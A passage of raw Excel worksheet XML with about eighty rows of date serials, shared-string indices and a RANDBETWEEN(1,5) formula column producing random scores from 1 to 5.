      <c r="E14250" s="2" t="s">
        <v>12787</v>
      </c>
      <c r="F14250">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14251" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A14251" s="1">
        <v>43246.144236111111</v>
      </c>
      <c r="C14251" t="s">
        <v>10</v>
      </c>
      <c r="D14251" t="s">
        <v>367</v>
      </c>
      <c r="E14251" s="2" t="s">
        <v>12788</v>
      </c>
      <c r="F14251">
        <f t="shared" ca="1" si="222"/>
        <v>4</v>
      </c>
    </row>
    <row r="14252" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14252" s="1">
        <v>43246.105381944442</v>
      </c>
      <c r="C14252" t="s">
        <v>318</v>
      </c>
      <c r="E14252" t="s">
        <v>12789</v>
      </c>
      <c r="F14252">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14253" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14253" s="1">
        <v>43246.105104166665</v>
      </c>
      <c r="C14253" t="s">
        <v>41</v>
      </c>
      <c r="E14253" t="s">
        <v>12790</v>
      </c>
      <c r="F14253">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14254" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14254" s="1">
        <v>43246.096284722225</v>
      </c>
      <c r="C14254" t="s">
        <v>454</v>
      </c>
      <c r="D14254" t="s">
        <v>7</v>
      </c>
      <c r="E14254" s="2" t="s">
        <v>12791</v>
      </c>
      <c r="F14254">
        <f t="shared" ca="1" si="222"/>
        <v>1</v>
      </c>
    </row>
    <row r="14255" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14255" s="1">
        <v>43246.093425925923</v>
      </c>
      <c r="C14255" t="s">
        <v>41</v>
      </c>
      <c r="E14255" t="s">
        <v>12792</v>
      </c>
      <c r="F14255">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14256" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14256" s="1">
        <v>43246.011712962965</v>
      </c>
      <c r="C14256" t="s">
        <v>41</v>
      </c>
      <c r="E14256" t="s">
        <v>11634</v>
      </c>
      <c r="F14256">
        <f t="shared" ca="1" si="222"/>
        <v>1</v>
      </c>
    </row>
    <row r="14257" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14257" s="1">
        <v>43245.825196759259</v>
      </c>
      <c r="C14257" t="s">
        <v>140</v>
      </c>
      <c r="D14257" t="s">
        <v>234</v>
      </c>
      <c r="E14257" t="s">
        <v>12793</v>
      </c>
      <c r="F14257">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14258" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A14258" s="1">
        <v>43245.775185185186</v>
      </c>
      <c r="C14258" t="s">
        <v>454</v>
      </c>
      <c r="D14258" t="s">
        <v>67</v>
      </c>
      <c r="E14258" s="2" t="s">
        <v>12794</v>
      </c>
      <c r="F14258">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14259" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14259" s="1">
        <v>43245.724722222221</v>
      </c>
      <c r="C14259" t="s">
        <v>6</v>
      </c>
      <c r="D14259" t="s">
        <v>25</v>
      </c>
      <c r="F14259">
        <f t="shared" ca="1" si="222"/>
        <v>1</v>
      </c>
    </row>
    <row r="14260" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14260" s="1">
        <v>43245.678240740737</v>
      </c>
      <c r="C14260" t="s">
        <v>7419</v>
      </c>
      <c r="D14260" t="s">
        <v>94</v>
      </c>
      <c r="E14260" s="2" t="s">
        <v>12795</v>
      </c>
      <c r="F14260">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14261" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A14261" s="1">
        <v>43245.653541666667</v>
      </c>
      <c r="C14261" t="s">
        <v>10</v>
      </c>
      <c r="D14261" t="s">
        <v>89</v>
      </c>
      <c r="E14261" s="2" t="s">
        <v>12796</v>
      </c>
      <c r="F14261">
        <f t="shared" ca="1" si="222"/>
        <v>1</v>
      </c>
    </row>
    <row r="14262" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14262" s="1">
        <v>43245.650057870371</v>
      </c>
      <c r="C14262" t="s">
        <v>6</v>
      </c>
      <c r="D14262" t="s">
        <v>194</v>
      </c>
      <c r="E14262" s="2" t="s">
        <v>12797</v>
      </c>
      <c r="F14262">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14263" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A14263" s="1">
        <v>43245.627615740741</v>
      </c>
      <c r="C14263" t="s">
        <v>6</v>
      </c>
      <c r="D14263" t="s">
        <v>821</v>
      </c>
      <c r="E14263" s="2" t="s">
        <v>12798</v>
      </c>
      <c r="F14263">
        <f t="shared" ca="1" si="222"/>
        <v>3</v>
      </c>
    </row>
    <row r="14264" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14264" s="1">
        <v>43245.610034722224</v>
      </c>
      <c r="C14264" t="s">
        <v>10</v>
      </c>
      <c r="D14264" t="s">
        <v>17</v>
      </c>
      <c r="E14264" t="s">
        <v>12799</v>
      </c>
      <c r="F14264">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14265" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14265" s="1">
        <v>43245.603495370371</v>
      </c>
      <c r="C14265" t="s">
        <v>10</v>
      </c>
      <c r="D14265" t="s">
        <v>178</v>
      </c>
      <c r="E14265" t="s">
        <v>12800</v>
      </c>
      <c r="F14265">
        <f t="shared" ca="1" si="222"/>
        <v>4</v>
      </c>
    </row>
    <row r="14266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14266" s="1">
        <v>43245.582638888889</v>
      </c>
      <c r="C14266" t="s">
        <v>41</v>
      </c>
      <c r="E14266" t="s">
        <v>12801</v>
      </c>
      <c r="F14266">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14267" s="1">
        <v>43245.580520833333</v>
      </c>
      <c r="C14267" t="s">
        <v>10</v>
      </c>
      <c r="D14267" t="s">
        <v>23</v>
      </c>
      <c r="E14267" t="s">
        <v>12802</v>
      </c>
      <c r="F14267">
        <f t="shared" ca="1" si="222"/>
        <v>3</v>
      </c>
    </row>
    <row r="14268" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14268" s="1">
        <v>43245.533900462964</v>
      </c>
      <c r="C14268" t="s">
        <v>10</v>
      </c>
      <c r="D14268" t="s">
        <v>92</v>
      </c>
      <c r="E14268" t="s">
        <v>12803</v>
      </c>
      <c r="F14268">
        <f t="shared" ca="1" si="222"/>
        <v>1</v>
      </c>
    </row>
    <row r="14269" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14269" s="1">
        <v>43245.489004629628</v>
      </c>
      <c r="C14269" t="s">
        <v>10</v>
      </c>
      <c r="D14269" t="s">
        <v>17</v>
      </c>
      <c r="E14269" t="s">
        <v>12804</v>
      </c>
      <c r="F14269">
        <f t="shared" ca="1" si="222"/>
        <v>3</v>
      </c>
    </row>
    <row r="14270" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14270" s="1">
        <v>43245.488807870373</v>
      </c>
      <c r="C14270" t="s">
        <v>173</v>
      </c>
      <c r="E14270" s="2" t="s">
        <v>12805</v>
      </c>
      <c r="F14270">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14271" s="1">
        <v>43245.481006944443</v>
      </c>
      <c r="C14271" t="s">
        <v>10</v>
      </c>
      <c r="D14271" t="s">
        <v>92</v>
      </c>
      <c r="E14271" t="s">
        <v>12806</v>
      </c>
      <c r="F14271">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14272" s="1">
        <v>43245.463923611111</v>
      </c>
      <c r="C14272" t="s">
        <v>10</v>
      </c>
      <c r="D14272" t="s">
        <v>89</v>
      </c>
      <c r="E14272" t="s">
        <v>12807</v>
      </c>
      <c r="F14272">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14273" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14273" s="1">
        <v>43245.449618055558</v>
      </c>
      <c r="C14273" t="s">
        <v>71</v>
      </c>
      <c r="E14273" t="s">
        <v>12808</v>
      </c>
      <c r="F14273">
        <f t="shared" ca="1" si="222"/>
        <v>3</v>
      </c>
    </row>
    <row r="14274" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14274" s="1">
        <v>43245.440069444441</v>
      </c>
      <c r="C14274" t="s">
        <v>410</v>
      </c>
      <c r="D14274" t="s">
        <v>39</v>
      </c>
      <c r="E14274" t="s">
        <v>12809</v>
      </c>
      <c r="F14274">
        <f t="shared" ref="F14274:F14337" ca="1" si="223">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="14275" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A14275" s="1">
        <v>43245.422743055555</v>
      </c>
      <c r="C14275" t="s">
        <v>454</v>
      </c>
      <c r="D14275" t="s">
        <v>480</v>
      </c>
      <c r="E14275" s="2" t="s">
        <v>12810</v>
      </c>
      <c r="F14275">
        <f t="shared" ca="1" si="223"/>
        <v>2</v>
      </c>
    </row>
    <row r="14276" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14276" s="1">
        <v>43245.409351851849</v>
      </c>
      <c r="C14276" t="s">
        <v>10</v>
      </c>
      <c r="D14276" t="s">
        <v>11</v>
      </c>
      <c r="E14276" t="s">
        <v>12811</v>
      </c>
      <c r="F14276">
        <f t="shared" ca="1" si="223"/>
        <v>3</v>
      </c>
    </row>
    <row r="14277" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14277" s="1">
        <v>43245.397037037037</v>
      </c>
      <c r="C14277" t="s">
        <v>454</v>
      </c>
      <c r="D14277" t="s">
        <v>194</v>
      </c>
      <c r="E14277" s="2" t="s">
        <v>12812</v>
      </c>
      <c r="F14277">
        <f t="shared" ca="1" si="223"/>
        <v>2</v>
      </c>
    </row>
    <row r="14278" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14278" s="1">
        <v>43245.390567129631</v>
      </c>
      <c r="C14278" t="s">
        <v>10</v>
      </c>
      <c r="D14278" t="s">
        <v>20</v>
      </c>
      <c r="E14278" s="2" t="s">
        <v>12813</v>
      </c>
      <c r="F14278">
        <f t="shared" ca="1" si="223"/>
        <v>4</v>
      </c>
    </row>
    <row r="14279" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14279" s="1">
        <v>43245.378692129627</v>
      </c>
      <c r="C14279" t="s">
        <v>6</v>
      </c>
      <c r="D14279" t="s">
        <v>25</v>
      </c>
      <c r="E14279" t="s">
        <v>12814</v>
      </c>
      <c r="F14279">
        <f t="shared" ca="1" si="223"/>
        <v>4</v>
      </c>
    </row>
    <row r="14280" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14280" s="1">
        <v>43245.369976851849</v>
      </c>
      <c r="C14280" t="s">
        <v>118</v>
      </c>
      <c r="E14280" t="s">
        <v>12815</v>
      </c>
      <c r="F14280">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14281" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A14281" s="1">
        <v>43245.304409722223</v>
      </c>
      <c r="C14281" t="s">
        <v>154</v>
      </c>
      <c r="D14281" t="s">
        <v>17</v>
      </c>
      <c r="E14281" s="2" t="s">
        <v>12816</v>
      </c>
      <c r="F14281">
        <f t="shared" ca="1" si="223"/>
        <v>5</v>
      </c>
    </row>
    <row r="14282" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14282" s="1">
        <v>43245.283773148149</v>
      </c>
      <c r="C14282" t="s">
        <v>229</v>
      </c>
      <c r="E14282" t="s">
        <v>12817</v>
      </c>
      <c r="F14282">
        <f t="shared" ca="1" si="223"/>
        <v>5</v>
      </c>
    </row>
    <row r="14283" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14283" s="1">
        <v>43245.212175925924</v>
      </c>
      <c r="C14283" t="s">
        <v>471</v>
      </c>
      <c r="E14283" t="s">
        <v>12818</v>
      </c>
      <c r="F14283">
        <f t="shared" ca="1" si="223"/>
        <v>4</v>
      </c>
    </row>
    <row r="14284" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14284" s="1">
        <v>43245.205891203703</v>
      </c>
      <c r="C14284" t="s">
        <v>48</v>
      </c>
      <c r="E14284" s="2" t="s">
        <v>12819</v>
      </c>
      <c r="F14284">
        <f t="shared" ca="1" si="223"/>
        <v>5</v>
      </c>
    </row>
    <row r="14285" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A14285" s="1">
        <v>43245.188634259262</v>
      </c>
      <c r="C14285" t="s">
        <v>463</v>
      </c>
      <c r="E14285" s="2" t="s">
        <v>12820</v>
      </c>
      <c r="F14285">
        <f t="shared" ca="1" si="223"/>
        <v>4</v>
      </c>
    </row>
    <row r="14286" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14286" s="1">
        <v>43245.124618055554</v>
      </c>
      <c r="C14286" t="s">
        <v>10</v>
      </c>
      <c r="D14286" t="s">
        <v>178</v>
      </c>
      <c r="E14286" t="s">
        <v>12821</v>
      </c>
      <c r="F14286">
        <f t="shared" ca="1" si="223"/>
        <v>5</v>
      </c>
    </row>
    <row r="14287" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14287" s="1">
        <v>43245.087905092594</v>
      </c>
      <c r="C14287" t="s">
        <v>73</v>
      </c>
      <c r="E14287" s="2" t="s">
        <v>12822</v>
      </c>
      <c r="F14287">
        <f t="shared" ca="1" si="223"/>
        <v>4</v>
      </c>
    </row>
    <row r="14288" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14288" s="1">
        <v>43245.07203703704</v>
      </c>
      <c r="C14288" t="s">
        <v>48</v>
      </c>
      <c r="E14288" s="2" t="s">
        <v>12823</v>
      </c>
      <c r="F14288">
        <f t="shared" ca="1" si="223"/>
        <v>5</v>
      </c>
    </row>
    <row r="14289" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14289" s="1">
        <v>43245.048090277778</v>
      </c>
      <c r="C14289" t="s">
        <v>7419</v>
      </c>
      <c r="D14289" t="s">
        <v>2139</v>
      </c>
      <c r="E14289" s="2" t="s">
        <v>12824</v>
      </c>
      <c r="F14289">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14290" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14290" s="1">
        <v>43245.015810185185</v>
      </c>
      <c r="C14290" t="s">
        <v>41</v>
      </c>
      <c r="E14290" s="2" t="s">
        <v>58</v>
      </c>
      <c r="F14290">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14291" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14291" s="1">
        <v>43244.925717592596</v>
      </c>
      <c r="C14291" t="s">
        <v>253</v>
      </c>
      <c r="E14291" t="s">
        <v>12825</v>
      </c>
      <c r="F14291">
        <f t="shared" ca="1" si="223"/>
        <v>5</v>
      </c>
    </row>
    <row r="14292" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14292" s="1">
        <v>43244.896423611113</v>
      </c>
      <c r="C14292" t="s">
        <v>140</v>
      </c>
      <c r="D14292" t="s">
        <v>312</v>
      </c>
      <c r="E14292" t="s">
        <v>12826</v>
      </c>
      <c r="F14292">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14293" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14293" s="1">
        <v>43244.890046296299</v>
      </c>
      <c r="C14293" t="s">
        <v>10</v>
      </c>
      <c r="D14293" t="s">
        <v>20</v>
      </c>
      <c r="E14293" t="s">
        <v>12827</v>
      </c>
      <c r="F14293">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14294" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A14294" s="1">
        <v>43244.784791666665</v>
      </c>
      <c r="C14294" t="s">
        <v>10</v>
      </c>
      <c r="D14294" t="s">
        <v>6</v>
      </c>
      <c r="E14294" s="2" t="s">
        <v>12828</v>
      </c>
      <c r="F14294">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14295" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14295" s="1">
        <v>43244.737800925926</v>
      </c>
      <c r="C14295" t="s">
        <v>10</v>
      </c>
      <c r="D14295" t="s">
        <v>192</v>
      </c>
      <c r="E14295" s="2" t="s">
        <v>12829</v>
      </c>
      <c r="F14295">
        <f t="shared" ca="1" si="223"/>
        <v>4</v>
      </c>
    </row>
    <row r="14296" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14296" s="1">
        <v>43244.725462962961</v>
      </c>
      <c r="C14296" t="s">
        <v>10</v>
      </c>
      <c r="D14296" t="s">
        <v>6</v>
      </c>
      <c r="E14296" t="s">
        <v>12830</v>
      </c>
      <c r="F14296">
        <f t="shared" ca="1" si="223"/>
        <v>5</v>
      </c>
    </row>
    <row r="14297" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14297" s="1">
        <v>43244.718171296299</v>
      </c>
      <c r="C14297" t="s">
        <v>10</v>
      </c>
      <c r="D14297" t="s">
        <v>381</v>
      </c>
      <c r="E14297" t="s">
        <v>12831</v>
      </c>
      <c r="F14297">
        <f t="shared" ca="1" si="223"/>
        <v>5</v>
      </c>
    </row>
    <row r="14298" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14298" s="1">
        <v>43244.713171296295</v>
      </c>
      <c r="C14298" t="s">
        <v>118</v>
      </c>
      <c r="D14298" t="s">
        <v>56</v>
      </c>
      <c r="E14298" s="2" t="s">
        <v>12832</v>
      </c>
      <c r="F14298">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14299" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14299" s="1">
        <v>43244.707719907405</v>
      </c>
      <c r="C14299" t="s">
        <v>7419</v>
      </c>
      <c r="D14299" t="s">
        <v>251</v>
      </c>
      <c r="E14299" s="2" t="s">
        <v>12833</v>
      </c>
      <c r="F14299">
        <f t="shared" ca="1" si="223"/>
        <v>2</v>
      </c>
    </row>
    <row r="14300" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A14300" s="1">
        <v>43244.701481481483</v>
      </c>
      <c r="C14300" t="s">
        <v>16</v>
      </c>
      <c r="E14300" s="2" t="s">
        <v>12834</v>
      </c>
      <c r="F14300">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14301" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14301" s="1">
        <v>43244.665856481479</v>
      </c>
      <c r="C14301" t="s">
        <v>749</v>
      </c>
      <c r="D14301" t="s">
        <v>124</v>
      </c>
      <c r="E14301" s="2" t="s">
        <v>12835</v>
      </c>
      <c r="F14301">
        <f t="shared" ca="1" si="223"/>
        <v>3</v>
      </c>
    </row>
    <row r="14302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14302" s="1">
        <v>43244.653946759259</v>
      </c>
      <c r="C14302" t="s">
        <v>10</v>
      </c>
      <c r="D14302" t="s">
        <v>192</v>
      </c>
      <c r="E14302" t="s">
        <v>12836</v>
      </c>
      <c r="F14302">
        <f t="shared" ca="1" si="223"/>
        <v>5</v>
      </c>
    </row>
    <row r="14303" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A14303" s="1">
        <v>43244.637974537036</v>
      </c>
      <c r="C14303" t="s">
        <v>10</v>
      </c>
      <c r="D14303" t="s">
        <v>17</v>
      </c>
      <c r="E14303" s="2" t="s">
        <v>12837</v>
      </c>
      <c r="F14303">
        <f t="shared" ca="1" si="223"/>
        <v>4</v>
      </c>
    </row>
    <row r="14304" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14304" s="1">
        <v>43244.616770833331</v>
      </c>
      <c r="C14304" t="s">
        <v>454</v>
      </c>
      <c r="D14304" t="s">
        <v>312</v>
      </c>
      <c r="E14304" t="s">
        <v>12838</v>
      </c>
      <c r="F14304">
        <f t="shared" ca="1" si="223"/>
        <v>4</v>
      </c>
    </row>
    <row r="14305" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14305" s="1">
        <v>43244.616018518522</v>
      </c>
      <c r="C14305" t="s">
        <v>10</v>
      </c>
      <c r="D14305" t="s">
        <v>6</v>
      </c>
      <c r="E14305" t="s">
        <v>12839</v>
      </c>
      <c r="F14305">
        <f t="shared" ca="1" si="223"/>
        <v>3</v>
      </c>
    </row>
    <row r="14306" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14306" s="1">
        <v>43244.611168981479</v>
      </c>
      <c r="C14306" t="s">
        <v>6</v>
      </c>
      <c r="D14306" t="s">
        <v>25</v>
      </c>
      <c r="E14306" t="s">
        <v>12840</v>
      </c>
      <c r="F14306">
        <f t="shared" ca="1" si="223"/>
        <v>2</v>
      </c>
    </row>
    <row r="14307" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14307" s="1">
        <v>43244.610069444447</v>
      </c>
      <c r="C14307" t="s">
        <v>10</v>
      </c>
      <c r="D14307" t="s">
        <v>89</v>
      </c>
      <c r="E14307" t="s">
        <v>12841</v>
      </c>
      <c r="F14307">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14308" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14308" s="1">
        <v>43244.60434027778</v>
      </c>
      <c r="C14308" t="s">
        <v>10</v>
      </c>
      <c r="D14308" t="s">
        <v>23</v>
      </c>
      <c r="E14308" s="2" t="s">
        <v>12842</v>
      </c>
      <c r="F14308">
        <f t="shared" ca="1" si="223"/>
        <v>5</v>
      </c>
    </row>
    <row r="14309" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14309" s="1">
        <v>43244.577372685184</v>
      </c>
      <c r="C14309" t="s">
        <v>10</v>
      </c>
      <c r="D14309" t="s">
        <v>163</v>
      </c>
      <c r="F14309">
        <f t="shared" ca="1" si="223"/>
        <v>3</v>
      </c>
    </row>
    <row r="14310" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14310" s="1">
        <v>43244.57</v>
      </c>
      <c r="C14310" t="s">
        <v>41</v>
      </c>
      <c r="E14310" t="s">
        <v>12843</v>
      </c>
      <c r="F14310">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14311" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14311" s="1">
        <v>43244.526747685188</v>
      </c>
      <c r="C14311" t="s">
        <v>6</v>
      </c>
      <c r="D14311" t="s">
        <v>25</v>
      </c>
      <c r="E14311" t="s">
        <v>12844</v>
      </c>
      <c r="F14311">
        <f t="shared" ca="1" si="223"/>
        <v>5</v>
      </c>
    </row>
    <row r="14312" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14312" s="1">
        <v>43244.509421296294</v>
      </c>
      <c r="C14312" t="s">
        <v>623</v>
      </c>
      <c r="E14312" s="2" t="s">
        <v>12845</v>
      </c>
      <c r="F14312">
        <f t="shared" ca="1" si="223"/>
        <v>2</v>
      </c>
    </row>
    <row r="14313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14313" s="1">
        <v>43244.508391203701</v>
      </c>
      <c r="C14313" t="s">
        <v>10</v>
      </c>
      <c r="D14313" t="s">
        <v>39</v>
      </c>
      <c r="E14313" t="s">
        <v>12846</v>
      </c>
      <c r="F14313">
        <f t="shared" ca="1" si="223"/>
        <v>3</v>
      </c>
    </row>
    <row r="14314" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14314" s="1">
        <v>43244.507719907408</v>
      </c>
      <c r="C14314" t="s">
        <v>2452</v>
      </c>
      <c r="D14314" t="s">
        <v>20</v>
      </c>
      <c r="E14314" s="2" t="s">
        <v>12847</v>
      </c>
      <c r="F14314">
        <f t="shared" ca="1" si="223"/>
        <v>3</v>
      </c>
    </row>
    <row r="14315" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14315" s="1">
        <v>43244.505243055559</v>
      </c>
      <c r="C14315" t="s">
        <v>10</v>
      </c>
      <c r="D14315" t="s">
        <v>52</v>
      </c>
      <c r="E14315" s="2" t="s">
        <v>12848</v>
      </c>
      <c r="F14315">
        <f t="shared" ca="1" si="223"/>
        <v>5</v>
      </c>
    </row>
    <row r="14316" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14316" s="1">
        <v>43244.477685185186</v>
      </c>
      <c r="C14316" t="s">
        <v>48</v>
      </c>
      <c r="D14316" t="s">
        <v>312</v>
      </c>
      <c r="E14316" t="s">
        <v>12849</v>
      </c>
      <c r="F14316">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14317" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14317" s="1">
        <v>43244.477465277778</v>
      </c>
      <c r="C14317" t="s">
        <v>41</v>
      </c>
      <c r="E14317" t="s">
        <v>12850</v>
      </c>
      <c r="F14317">
        <f t="shared" ca="1" si="223"/>
        <v>3</v>
      </c>
    </row>
    <row r="14318" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14318" s="1">
        <v>43244.473321759258</v>
      </c>
      <c r="C14318" t="s">
        <v>10</v>
      </c>
      <c r="D14318" t="s">
        <v>112</v>
      </c>
      <c r="E14318" t="s">
        <v>12851</v>
      </c>
      <c r="F14318">
        <f t="shared" ca="1" si="223"/>
        <v>4</v>
      </c>
    </row>
    <row r="14319" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14319" s="1">
        <v>43244.455011574071</v>
      </c>
      <c r="C14319" t="s">
        <v>10</v>
      </c>
      <c r="D14319" t="s">
        <v>36</v>
      </c>
      <c r="E14319" s="2" t="s">
        <v>12852</v>
      </c>
      <c r="F14319">
        <f t="shared" ca="1" si="223"/>
        <v>3</v>
      </c>
    </row>
    <row r="14320" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14320" s="1">
        <v>43244.436724537038</v>
      </c>
      <c r="C14320" t="s">
        <v>124</v>
      </c>
      <c r="E14320" s="2" t="s">
        <v>12853</v>
      </c>
      <c r="F14320">
        <f t="shared" ca="1" si="223"/>
        <v>3</v>
      </c>
    </row>
    <row r="14321" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14321" s="1">
        <v>43244.415543981479</v>
      </c>
      <c r="C14321" t="s">
        <v>260</v>
      </c>
      <c r="F14321">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14322" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14322" s="1">
        <v>43244.408703703702</v>
      </c>
      <c r="C14322" t="s">
        <v>10</v>
      </c>
      <c r="D14322" t="s">
        <v>23</v>
      </c>
      <c r="E14322" t="s">
        <v>12854</v>
      </c>
      <c r="F14322">
        <f t="shared" ca="1" si="223"/>
        <v>3</v>
      </c>
    </row>
    <row r="14323" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14323" s="1">
        <v>43244.383148148147</v>
      </c>
      <c r="C14323" t="s">
        <v>10</v>
      </c>
      <c r="D14323" t="s">
        <v>163</v>
      </c>
      <c r="E14323" s="2" t="s">
        <v>12855</v>
      </c>
      <c r="F14323">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14324" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14324" s="1">
        <v>43244.369525462964</v>
      </c>
      <c r="C14324" t="s">
        <v>10</v>
      </c>
      <c r="D14324" t="s">
        <v>11</v>
      </c>
      <c r="E14324" t="s">
        <v>12856</v>
      </c>
      <c r="F14324">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14325" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14325" s="1">
        <v>43244.358275462961</v>
      </c>
      <c r="C14325" t="s">
        <v>10</v>
      </c>
      <c r="D14325" t="s">
        <v>271</v>
      </c>
      <c r="E14325" t="s">
        <v>12857</v>
      </c>
      <c r="F14325">
        <f t="shared" ca="1" si="223"/>
        <v>2</v>
      </c>
    </row>
    <row r="14326" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14326" s="1">
        <v>43244.333969907406</v>
      </c>
      <c r="C14326" t="s">
        <v>2545</v>
      </c>
      <c r="D14326" t="s">
        <v>163</v>
      </c>
      <c r="E14326" s="2" t="s">
        <v>12858</v>
      </c>
      <c r="F14326">
        <f t="shared" ca="1" si="223"/>
        <v>2</v>
      </c>
    </row>
    <row r="14327" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14327" s="1">
        <v>43244.316886574074</v>
      </c>
      <c r="C14327" t="s">
        <v>48</v>
      </c>
      <c r="E14327" s="2" t="s">
        <v>12859</v>
      </c>
      <c r="F14327">
        <f t="shared" ca="1" si="223"/>
        <v>4</v>
